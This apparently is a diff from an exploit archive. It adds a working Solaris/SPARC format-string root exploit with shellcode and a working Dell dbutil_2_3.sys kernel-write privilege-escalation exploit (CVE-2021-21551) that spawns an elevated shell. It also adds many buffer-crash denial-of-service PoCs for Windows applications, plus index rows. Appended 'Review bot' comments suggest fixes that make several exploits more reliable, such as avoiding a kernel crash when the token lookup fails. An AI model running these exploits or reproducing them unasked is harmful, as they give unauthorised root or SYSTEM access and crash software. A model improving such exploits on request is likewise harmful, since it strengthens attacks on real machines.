* $ ksh
* # id
* uid=100(user) gid=1(other) euid=0(root) egid=2(bin)
* #
*
* Tested on:
* SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise
* [previous Solaris versions are also likely vulnerable (and easier to exploit)]
*/
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/systeminfo.h>
#define INFO1 "raptor_dtprintcheckdir_sparc2.c - Solaris/SPARC FMT LPE"
#define INFO2 "Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/dt/bin/dtprintinfo" // vulnerable program
#define BUFSIZE 3000 // size of evil env var
#define BUFSIZE2 10000 // size of padding buf
#define STACKPOPSEQ "%.8x" // stackpop sequence
#define STACKPOPS 383 // number of stackpops
/* default retloc is .plt/strlen in libc */
#define LIBCBASE 0xfe800000 // base address of libc
#define STRLEN 0x0014369c // .plt/strlen offset
/* calculate numeric arguments for write string */
#define CALCARGS(N1, N2, N3, N4, B1, B2, B3, B4, BASE) { \
N1 = (B4 - BASE) % 0x100; \
N2 = (B2 - BASE - N1) % 0x100; \
N3 = (B1 - BASE - N1 - N2) % 0x100; \
N4 = (B3 - BASE - N1 - N2 - N3) % 0x100; \
BASE += N1 + N2 + N3 + N4; \
}
char sc[] = /* Solaris/SPARC chmod() shellcode (max size is 36 bytes) */
/* chmod("./me", 037777777777) */
"\x92\x20\x20\x01" /* sub %g0, 1, %o1 */
"\x20\xbf\xff\xff" /* bn,a <sc - 4> */
"\x20\xbf\xff\xff" /* bn,a <sc> */
"\x7f\xff\xff\xff" /* call <sc + 4> */
"\x90\x03\xe0\x14" /* add %o7, 0x14, %o0 */
"\xc0\x22\x20\x04" /* clr [ %o0 + 4 ] */
"\x82\x10\x20\x0f" /* mov 0xf, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"./me";
/* globals */
char *arg[2] = {"foo", NULL};
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void check_zero(int addr, char *pattern);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], *p = buf, buf2[BUFSIZE2];
char platform[256], release[256], display[256];
int retloc = LIBCBASE + STRLEN;
int i, stackpops = STACKPOPS;
unsigned base, n[strlen(sc)]; /* must be unsigned */
/* lpstat code to add a fake printer */
if (!strcmp(argv[0], "lpstat")) {
/* check command line */
if (argc != 2)
exit(1);
/* print the expected output and exit */
if(!strcmp(argv[1], "-v")) {
fprintf(stderr, "lpstat called with -v\n");
printf("device for fnord: /dev/null\n");
} else {
fprintf(stderr, "lpstat called with -d\n");
printf("system default destination: fnord\n");
}
exit(0);
}
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* process command line */
if (argc < 2) {
fprintf(stderr, "usage:\n$ %s xserver:display [retloc]\n$ /bin/ksh\n\n", argv[0]);
exit(1);
}
sprintf(display, "DISPLAY=%s", argv[1]);
if (argc > 2)
retloc = (int)strtoul(argv[2], (char **)NULL, 0);
/* evil env var: name + shellcode + padding */
bzero(buf, sizeof(buf));
memcpy(buf, "REQ_DIR=", strlen("REQ_DIR="));
p += strlen("REQ_DIR=");
/* padding buffer to avoid stack overflow */
memset(buf2, 'B', sizeof(buf2));
buf2[sizeof(buf2) - 1] = 0x0;
/* fill the envp, keeping padding */
add_env(buf2);
add_env(buf);
add_env(display);
add_env("TMP_DIR=/tmp/just"); /* we must control this empty dir */
add_env("PATH=.:/usr/bin");
add_env("HOME=/tmp");
add_env(NULL);
/* format string: retloc */
for (i = retloc; i - retloc < strlen(sc); i += 4) {
check_zero(i, "ret location");
*((void **)p) = (void *)(i); p += 4; /* 0x000000ff */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i); p += 4; /* 0x00ff0000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i); p += 4; /* 0xff000000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i + 2); p += 4; /* 0x0000ff00 */
memset(p, 'A', 4); p += 4; /* dummy */
}
/* format string: stackpop sequence */
base = p - buf - strlen("REQ_DIR=");
for (i = 0; i < stackpops; i++, p += strlen(STACKPOPSEQ), base += 8)
memcpy(p, STACKPOPSEQ, strlen(STACKPOPSEQ));
/* calculate numeric arguments */
for (i = 0; i < strlen(sc); i += 4)
CALCARGS(n[i], n[i + 1], n[i + 2], n[i + 3], sc[i], sc[i + 1], sc[i + 2], sc[i + 3], base);
/* check for potentially dangerous numeric arguments below 10 */
for (i = 0; i < strlen(sc); i++)
n[i] += (n[i] < 10) ? (0x100) : (0);
/* format string: write string */
for (i = 0; i < strlen(sc); i += 4)
p += sprintf(p, "%%.%dx%%n%%.%dx%%hn%%.%dx%%hhn%%.%dx%%hhn", n[i], n[i + 1], n[i + 2], n[i + 3]);
/* setup the directory structure and the symlink to /bin/ksh */
unlink("/tmp/just/chmod/me");
rmdir("/tmp/just/chmod");
rmdir("/tmp/just");
mkdir("/tmp/just", S_IRWXU | S_IRWXG | S_IRWXO);
mkdir("/tmp/just/chmod", S_IRWXU | S_IRWXG | S_IRWXO);
symlink("/bin/ksh", "/tmp/just/chmod/me");
/* create a symlink for the fake lpstat */
unlink("lpstat");
symlink(argv[0], "lpstat");
/* print some output */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using libc/.plt/strlen\t: 0x%p\n\n", (void *)retloc);
fprintf(stderr, "Don't worry if you get a SIGILL, just run /bin/ksh anyway!\n\n");
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(1);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return env_len;
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return env_len;
}
/*
* check_zero(): check an address for the presence of a 0x00
*/
void check_zero(int addr, char *pattern)
{
if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
!(addr & 0xff000000)) {
fprintf(stderr, "error: %s contains a 0x00!\n", pattern);
exit(1);
}
}
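Review bot: `sprintf(display, "DISPLAY=%s", argv[1])` near the top of this block copies an argument of unbounded length into the fixed-size `display` buffer, so an over-long display string overruns the exploit's own stack before the target is ever reached; use `snprintf(display, sizeof(display), "DISPLAY=%s", argv[1])` and bail out if the result is truncated. The loop `for (i = retloc; i - retloc < strlen(sc); i += 4)` also compares a signed `int` difference with a `size_t`; casting `strlen(sc)` to `int` (or making `i` a `size_t`) avoids the implicit conversion warning.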


@ -0,0 +1,29 @@
# Exploit Title: Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)
# Date: 2021-02-15
# Exploit Author: Ismael Nava
# Vendor Homepage: https://switchportmapper.com/
# Software Link: https://switchportmapper.com/download.htm
# Version: 2.85.2
# Tested on: Windows 10 Home x64
#STEPS
# Open the program Managed Switch Port Mapping Tool
# In the left side select Settings from Router/Srvr 1 (for layer 2 Switches)
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Gou.txt"
# Paste the content in the field IP Address and SNMP v1/v2c Read Community Name
# Click in OK
# End :)
buffer = 'F' * 10000
try:
file = open("Gou2.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")
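Review bot: the steps at the top tell the reader to copy the content of "Gou.txt", but the script writes "Gou2.txt" (`file = open("Gou2.txt","w")`), so one of the two names must change. The bare `except:` also hides the real cause of a failed write (read-only directory, permission denied); catch `OSError as e` and print `e` so a failed run is diagnosable.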


@ -0,0 +1,27 @@
# Exploit Title: AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)
# Date: 2021-02-15
# Exploit Author: Ismael Nava
# Vendor Homepage: http://agatasoft.com/
# Software Link: http://agatasoft.com/Ping_Master_Pro.exe
# Version: 2.1
# Tested on: Windows 10 Home x64
#STEPS
# Open the program AgataSoft PingMaster Pro
# In Tools select the option Trace Route
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Gou.txt"
# Paste the content in the field Host name and click in Get IP from host name
# End :)
buffer = 'S' * 10000
try:
file = open("Gou.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")


@ -0,0 +1,29 @@
# Exploit Title: Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)
# Date: 2021-02-15
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.nsauditor.com/
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Version: 3.2.2.0
# Tested on: Windows 10 Home x64
#STEPS
# Open the program Nsauditor
# In Options select Configuration...
# Click in Security Events
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Liella.txt"
# Paste the content in the field Event Description and click in Add Event
# End :)
buffer = 'U' * 10000
try:
file = open("Liella.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")

exploits/windows/dos/49590.py Executable file

@ -0,0 +1,30 @@
# Exploit Title: Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
# Exploit Author : Sinem Şahin
# Exploit Date: 2021-02-23
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
# Version: 4.2.7
# Tested on: Windows 7 x64
# Steps:
1- Run the python script. (exploit.py)
2- Open payload.txt and copy content to clipboard.
3- Run 'Product Key Explorer 4.2.7'.
4- Register -> Enter Registration Code
5- Paste clipboard into the "Key" or "Name".
6- Click on OK.
7- Crashed.
---> exploit.py <--
#!/usr/bin/env python
buffer = "\x41" * 300
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print "File created!"
except:
print "File cannot be created!!"
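Review bot: the step lines from `1- Run the python script. (exploit.py)` down to `---> exploit.py <--` are not comments, so this .py file (exploits/windows/dos/49590.py) raises a SyntaxError before doing anything; prefix each of them with `#`. Separately, `print "File created!"` and `print "File cannot be created!!"` are Python 2 syntax under a `#!/usr/bin/env python` shebang that resolves to Python 3 on current systems; write them as `print("File created!")`.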

exploits/windows/dos/49844.py Executable file

@ -0,0 +1,18 @@
# Exploit Title: Sandboxie 5.49.7 - Denial of Service (PoC)
# Date: 06/05/2021
# Author: Erick Galindo
# Vendor Homepage: https://sandboxie-plus.com/
# Software https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Classic-x64-v5.49.7.exe
# Version: 5.49.7
# Tested on: Windows 10 Pro x64 es
# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Sandboxie Control->Sandbox->Set Container Folder
#3.- Paste the buffer in the input then press ok
buffer = "\x41" * 5000
f = open ("Sandboxie10.txt", "w")
f.write(buffer)
f.close()
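Review bot: step 1 says to copy the printed "AAAAA..." string to the clipboard, but the script prints nothing and writes the buffer to Sandboxie10.txt instead; update the step to name the file (or add a print). Unlike the sibling PoCs, the `open`/`write` is not wrapped in try/except, so a failed write surfaces as a raw traceback rather than a message.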


@ -0,0 +1,30 @@
# Exploit Title: iDailyDiary 4.30 - Denial of Service (PoC)
# Date: 2021-05-21
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.splinterware.com/index.html
# Software Link: https://www.splinterware.com/download/iddfree.exe
# Version: 4.30
# Tested on: Windows 10 Home x64
#STEPS
# Open the program iDailyDiary
# Create a New Diary, put any name and check the option "Do not prompt for password", click in OK
# In the tab "View", click in "Preferences"
# Click in the option "Tabs"
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Sotsu.txt"
# Paste the content in the field below "Default diary tab name when creating new tabs"
# Click in Apply
# End :)
buffer = 'F' * 2000000
try:
file = open("Sotsu.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")

exploits/windows/dos/49906.py Executable file

@ -0,0 +1,29 @@
# Exploit Title: RarmaRadio 2.72.8 - Denial of Service (PoC)
# Date: 2021-05-25
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.raimersoft.com/
# Software Link: http://raimersoft.com/downloads/rarmaradio_setup.exe
# Version: 2.75.8
# Tested on: Windows 10 Home x64
#STEPS
# Open the program RarmaRadio
# Click in Edit and select Settings
# Click in Network option
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Lambda.txt"
# Paste the content in the fields Username, Server, Port and User Agent
# Click in OK
# End :)
buffer = 'Ñ' * 100000
try:
file = open("Lambda.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")
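Review bot: the `# Version: 2.75.8` header contradicts the title's 2.72.8; one of them is a typo and the header should match the title. The literal `'Ñ' * 100000` is non-ASCII source with no `# -*- coding: utf-8 -*-` declaration, so Python 2 rejects the file outright, and on Python 3 `open("Lambda.txt","w")` encodes it in the locale's default code page; pass `encoding=` explicitly so the file content does not depend on the machine it was generated on.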

exploits/windows/dos/49917.py Executable file

@ -0,0 +1,27 @@
# Exploit Title: DupTerminator 1.4.5639.37199 - Denial of Service (PoC)
# Date: 2021-05-28
# Author: Brian Rodríguez
# Software Site: https://sourceforge.net/projects/dupterminator/
# Version: 1.4.5639.37199
# Category: DoS (Windows)
##### Vulnerability #####
DupTerminator is vulnerable to a DoS condition when a long list of characters is being used in field "Excluded" text box.
Successful exploitation will causes application stop working.
I have been able to test this exploit against Windows 10.
##### PoC #####
#!/usr/bin/env python
buffer = "\x41" * 8000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")
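Review bot: the three description lines under `##### Vulnerability #####` (`DupTerminator is vulnerable to a DoS condition ...`, `Successful exploitation will causes ...`, `I have been able to test ...`) are bare prose in a .py file (exploits/windows/dos/49917.py), so running it produces a SyntaxError; comment them out. The description also never says which dialog holds the "Excluded" text box, which the reader needs in order to reproduce the crash.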

exploits/windows/dos/50247.py Executable file

@ -0,0 +1,36 @@
# Exploit Title: Telegram Desktop 2.9.2 - Denial of Service (PoC)
# Exploit Author: Aryan Chehreghani
# Date: 2021-08-30
# Vendor Homepage: https://telegram.org
# Software Link: https://telegram.org/dl/desktop/win64
# Tested Version: 2.9.2 x64
# Tested on OS: Windows 10 Enterprise
# [ About App ]
#Telegram is a messaging app with a focus on speed and security, its super-fast, simple and free,
#You can use Telegram on all your devices at the same time — your messages sync seamlessly across any number of your phones, tablets or computers.
#Telegram has over 500 million monthly active users and is one of the 10 most downloaded apps in the world.
#With Telegram, you can send messages, photos, videos and files of any type (doc, zip, mp3, etc), as well as create groups for up to 200,000 people or channels for broadcasting to unlimited audiences.
#You can write to your phone contacts and find people by their usernames. As a result,
#Telegram is like SMS and email combined — and can take care of all your personal or business messaging needs,
#Telegram is support end-to-end encrypted voice and video calls, as well as voice chats in groups for thousands of participants.
# [ POC ]
# 1.Run the python script, it will create a new file "output.txt"
# 2.Run Telegram Desktop and go to "Saved Messages"
# 3.Copy the content of the file "output.txt"
# 4.Paste the content of dos.txt into the "Write a message..."
# 5.Crashed ;)
#!/usr/bin/env python
buffer = "\x41" * 9000000
try:
f=open("output.txt","w")
print("[!] Creating %s bytes DOS payload...." %len(buffer))
f.write(buffer)
f.close()
print("[!] File Created !")
except:
print("File cannot be created")
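Review bot: step 4 tells the reader to paste the content of `dos.txt`, while steps 1 and 3 and the code itself use `output.txt`; align the step with the code. The `#!/usr/bin/env python` shebang sits after the comment block rather than on line 1, so it has no effect; move it to the top. The `[ About App ]` block is vendor marketing copy and says nothing about the issue; replacing it with one sentence on which input (the message composer) and what length triggers the crash would be more useful to anyone triaging it.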


@ -0,0 +1,45 @@
# Exploit Tittle: Visual Studio Code 1.47.1 - Denial of Service (Poc)
# Exploit Author: H.H.A.Ravindu Priyankara
# Category: Denial of Service(DOS)
# Tested Version:1.47.1
# Vendor: Microsoft
# Software Download Link:https://code.visualstudio.com/updates/
Write-Host "
* *
*-------------------------------------------------------------------------------------------------------*
| |
|" -ForegroundColor Yellow -NoNewline; Write-Host " Exploit Tittle :-" -ForegroundColor Green -NoNewline; Write-Host " Visual Studio Code (VS Code) Denial of Service " -ForegroundColor Cyan -NoNewline; Write-Host " |
| |
|" -ForegroundColor Yellow -NoNewline; Write-Host " Author :-" -ForegroundColor Green -NoNewline; Write-Host " H.H.A.Ravindu.Priyankara " -ForegroundColor Cyan -NoNewline; Write-Host " |
| |
|" -ForegroundColor Yellow -NoNewline; Write-Host " Github :-" -ForegroundColor Green -NoNewline; Write-Host " https://github.com/Ravindu-Priyankara " -ForegroundColor Cyan -NoNewline; Write-Host " |
| |
|" -ForegroundColor Yellow -NoNewline; Write-Host " Youtube :-"-ForegroundColor Green -NoNewline; Write-Host " https://www.youtube.com/channel/UCKD2j5Mbr15RKaXBSIXwvMQ " -ForegroundColor Cyan -NoNewline; Write-Host " |
| |
|" -ForegroundColor Yellow -NoNewline; Write-Host " Linkedin :-"-ForegroundColor Green -NoNewline; Write-Host " https://www.linkedin.com/in/ravindu-priyankara-b77753209/ " -ForegroundColor Cyan -NoNewline; Write-Host " |
*-------------------------------------------------------------------------------------------------------*"-ForegroundColor Yellow
[string]$Userinpts = Read-Host -Prompt "Enter Run or Stop:-"
if ($Userinpts -eq "Run") {
Write-Output "Yeah I Know"
while ($True) {
$name = "AAAAAAA"
$name * 1000000
}
#or
#$name = "AAAAAAA"
#$name * 1000000
}
if ($Userinpts -eq "Stop") {
exit
}
#==========================================================
#==================== solution ============================
#==========================================================
#Update Your Visual Studio Code Application
# 1.47.1 version ==> 1.56.0 version
#==========================================================
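Review bot: the `while ($True)` loop has no exit, and `$name * 1000000` builds a 7,000,000-character string on every iteration that, being unassigned, is written straight to the host, so the script's own output is what saturates the terminal; the "Stop" prompt only matters before the loop starts, and any input other than Run/Stop falls through and the script ends silently (an `else { Write-Output "Unknown option" }` would make that explicit). The header misspells "Title" as "Tittle" in both the file header and the banner, and the "solution" block should name the fixed version as the vendor's upgrade target rather than as an arrow expression.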


@ -0,0 +1,219 @@
# Exploit Title: DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)
# Date: 10/05/2021
# Exploit Author: Paolo Stagno aka VoidSec
# Version: <= 2.3
# CVE: CVE-2021-21551
# Tested on: Windows 10 Pro x64 v.1903 Build 18362.30
# Blog: https://voidsec.com/reverse-engineering-and-exploiting-dell-cve-2021-21551/
#include <iostream>
#include <windows.h>
#include <winternl.h>
#include <tlhelp32.h>
#include <algorithm>
#define IOCTL_CODE 0x9B0C1EC8 // IOCTL_CODE value, used to reach the vulnerable function (taken from IDA)
#define SystemHandleInformation 0x10
#define SystemHandleInformationSize 1024 * 1024 * 2
// define the buffer structure which will be sent to the vulnerable driver
typedef struct Exploit
{
uint64_t Field1; // "padding" can be anything
void* Field2; // where to write
uint64_t Field3; // must be 0
uint64_t Field4; // value to write
};
typedef struct outBuffer
{
uint64_t Field1;
uint64_t Field2;
uint64_t Field3;
uint64_t Field4;
};
// define a pointer to the native function 'NtQuerySystemInformation'
using pNtQuerySystemInformation = NTSTATUS(WINAPI*)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
// define the SYSTEM_HANDLE_TABLE_ENTRY_INFO structure
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
USHORT UniqueProcessId;
USHORT CreatorBackTraceIndex;
UCHAR ObjectTypeIndex;
UCHAR HandleAttributes;
USHORT HandleValue;
PVOID Object;
ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
// define the SYSTEM_HANDLE_INFORMATION structure
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
int main(int argc, char** argv)
{
// open a handle to the device exposed by the driver - symlink is \\.\\DBUtil_2_3
HANDLE device = ::CreateFileW(
L"\\\\.\\DBUtil_2_3",
GENERIC_WRITE | GENERIC_READ,
NULL,
nullptr,
OPEN_EXISTING,
NULL,
NULL);
if (device == INVALID_HANDLE_VALUE)
{
std::cout << "[!] Couldn't open handle to DBUtil_2_3 driver. Error code: " << ::GetLastError() << std::endl;
return -1;
}
std::cout << "[+] Opened a handle to DBUtil_2_3 driver!\n";
// resolve the address of NtQuerySystemInformation and assign it to a function pointer
pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)::GetProcAddress(::LoadLibraryW(L"ntdll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
std::cout << "[!] Couldn't resolve NtQuerySystemInformation API. Error code: " << ::GetLastError() << std::endl;
return -1;
}
std::cout << "[+] Resolved NtQuerySystemInformation!\n";
// open the current process token - it will be used to retrieve its kernelspace address later
HANDLE currentProcess = ::GetCurrentProcess();
HANDLE currentToken = NULL;
bool success = ::OpenProcessToken(currentProcess, TOKEN_ALL_ACCESS, &currentToken);
if (!success)
{
std::cout << "[!] Couldn't open handle to the current process token. Error code: " << ::GetLastError() << std::endl;
return -1;
}
std::cout << "[+] Opened a handle to the current process token!\n";
// allocate space in the heap for the handle table information which will be filled by the call to 'NtQuerySystemInformation' API
PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(::GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize);
// call NtQuerySystemInformation and fill the handleTableInformation structure
ULONG returnLength = 0;
NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLength);
uint64_t tokenAddress = 0;
// iterate over the system's handle table and look for the handles beloging to our process
for (int i = 0; i < handleTableInformation->NumberOfHandles; i++)
{
SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[i];
// if it finds our process and the handle matches the current token handle we already opened, print it
if (handleInfo.UniqueProcessId == ::GetCurrentProcessId() && handleInfo.HandleValue == (USHORT)currentToken)
{
tokenAddress = (uint64_t)handleInfo.Object;
std::cout << "[+] Current token address in kernelspace is at: 0x" << std::hex << tokenAddress << std::endl;
}
}
outBuffer buffer =
{
0,
0,
0,
0
};
/*
dt nt!_SEP_TOKEN_PRIVILEGES
+0x000 Present : Uint8B
+0x008 Enabled : Uint8B
+0x010 EnabledByDefault : Uint8B
We've added +1 to the offsets to ensure that the low bytes part are 0xff.
*/
// overwrite the _SEP_TOKEN_PRIVILEGES "Present" field in the current process token
Exploit exploit =
{
0x4141414142424242,
(void*)(tokenAddress + 0x40),
0x0000000000000000,
0xffffffffffffffff
};
// overwrite the _SEP_TOKEN_PRIVILEGES "Enabled" field in the current process token
Exploit exploit2 =
{
0x4141414142424242,
(void*)(tokenAddress + 0x48),
0x0000000000000000,
0xffffffffffffffff
};
// overwrite the _SEP_TOKEN_PRIVILEGES "EnabledByDefault" field in the current process token
Exploit exploit3 =
{
0x4141414142424242,
(void*)(tokenAddress + 0x50),
0x0000000000000000,
0xffffffffffffffff
};
DWORD bytesReturned = 0;
success = DeviceIoControl(
device,
IOCTL_CODE,
&exploit,
sizeof(exploit),
&buffer,
sizeof(buffer),
&bytesReturned,
nullptr);
if (!success)
{
std::cout << "[!] Couldn't overwrite current token 'Present' field. Error code: " << ::GetLastError() << std::endl;
return -1;
}
std::cout << "[+] Successfully overwritten current token 'Present' field!\n";
success = DeviceIoControl(
device,
IOCTL_CODE,
&exploit2,
sizeof(exploit2),
&buffer,
sizeof(buffer),
&bytesReturned,
nullptr);
if (!success)
{
std::cout << "[!] Couldn't overwrite current token 'Enabled' field. Error code: " << ::GetLastError() << std::endl;
return -1;
}
std::cout << "[+] Successfully overwritten current token 'Enabled' field!\n";
success = DeviceIoControl(
device,
IOCTL_CODE,
&exploit3,
sizeof(exploit3),
&buffer,
sizeof(buffer),
&bytesReturned,
nullptr);
if (!success)
{
std::cout << "[!] Couldn't overwrite current token 'EnabledByDefault' field. Error code:" << ::GetLastError() << std::endl;
return -1;
}
std::cout << "[+] Successfully overwritten current token 'EnabledByDefault' field!\n";
std::cout << "[+] Token privileges successfully overwritten!\n";
std::cout << "[+] Spawning a new shell with full privileges!\n";
system("cmd.exe");
return 0;
}
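Review bot: `tokenAddress` starts at 0 and is only set when the handle-table walk finds a matching entry, but the three `DeviceIoControl` calls run regardless, so a failed lookup turns into a kernel write at 0x40/0x48/0x50 and a bugcheck; abort with an error when `tokenAddress == 0`. The lookup can fail silently because the `NtQuerySystemInformation` return value is never checked (it returns STATUS_INFO_LENGTH_MISMATCH when the fixed 2 MB `SystemHandleInformationSize` buffer is too small, which is common on busy systems); test the NTSTATUS and retry with `returnLength`. Minor: `typedef struct Exploit { ... };` declares a typedef with no alias name (MSVC warning C4091); drop the `typedef` or name the alias. The `device` and `currentToken` handles and the `HeapAlloc` block are never released.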


@ -0,0 +1,24 @@
# Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)
# Date: 2021-10-07
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://cmder.net
# Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip
# Version: v1.3.18
# Tested on: Windows 10
# [About - Cmder Console Emulator] :
#Cmder is a software package created over absence of usable console emulator on Windows.
#It is based on ConEmu with major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout.
# [Security Issue] :
#equires the execution of a .cmd file type and The created file enters the emulator ,That will trigger the buffer overflow condition.
#E.g λ cmder.cmd
# [POC] :
PAYLOAD=chr(235) + "\\CMDER"
PAYLOAD = PAYLOAD * 3000
with open("cmder.cmd", "w") as f:
f.write(PAYLOAD)
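Review bot: the `[Security Issue]` line is garbled (`#equires the execution of a .cmd file type and The created file enters the emulator ,That will trigger the buffer overflow condition.`) and does not say which component (Cmder's launcher, ConEmu, or clink) mishandles the file name or what the observed crash looks like; one sentence naming the crash location would help triage. `chr(235)` written through a text-mode `open` is encoded in the platform default on Python 3 but emitted as the raw byte 0xEB on Python 2, so the generated file differs between interpreters; write bytes through `open("cmder.cmd", "wb")` to make it deterministic.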


@ -6757,6 +6757,7 @@ id,file,description,date,author,type,platform,port
48637,exploits/windows/dos/48637.py,"Fire Web Server 0.1 - Remote Denial of Service (PoC)",1970-01-01,"Saeed reza Zamanian",dos,windows, 48637,exploits/windows/dos/48637.py,"Fire Web Server 0.1 - Remote Denial of Service (PoC)",1970-01-01,"Saeed reza Zamanian",dos,windows,
48638,exploits/linux/dos/48638.sh,"Grafana 7.0.1 - Denial of Service (PoC)",1970-01-01,mostwanted002,dos,linux, 48638,exploits/linux/dos/48638.sh,"Grafana 7.0.1 - Denial of Service (PoC)",1970-01-01,mostwanted002,dos,linux,
49589,exploits/windows/dos/49589.py,"SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)",1970-01-01,"Sinem Şahin",dos,windows, 49589,exploits/windows/dos/49589.py,"SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)",1970-01-01,"Sinem Şahin",dos,windows,
49590,exploits/windows/dos/49590.py,"Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)",1970-01-01,"Sinem Şahin",dos,windows,
48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",1970-01-01,"Felipe Winsnes",dos,windows, 48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",1970-01-01,"Felipe Winsnes",dos,windows,
48728,exploits/windows/dos/48728.py,"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)",1970-01-01,"Luis Martínez",dos,windows, 48728,exploits/windows/dos/48728.py,"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)",1970-01-01,"Luis Martínez",dos,windows,
48729,exploits/windows/dos/48729.py,"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)",1970-01-01,"Luis Martínez",dos,windows, 48729,exploits/windows/dos/48729.py,"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)",1970-01-01,"Luis Martínez",dos,windows,
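Review bot: the new 49590 row records `1970-01-01` as its date although the exploit header states 2021-02-23; every row in this diff, context and added alike, carries the same epoch placeholder, so either the date column is intentionally unused (in which case the header should say so) or the added rows need their real dates.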
@ -6769,19 +6770,33 @@ id,file,description,date,author,type,platform,port
49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows, 49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",1970-01-01,"Guillaume PETIT",dos,multiple, 49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",1970-01-01,"Guillaume PETIT",dos,multiple,
49337,exploits/windows/dos/49337.py,"Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)",1970-01-01,stresser,dos,windows, 49337,exploits/windows/dos/49337.py,"Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)",1970-01-01,stresser,dos,windows,
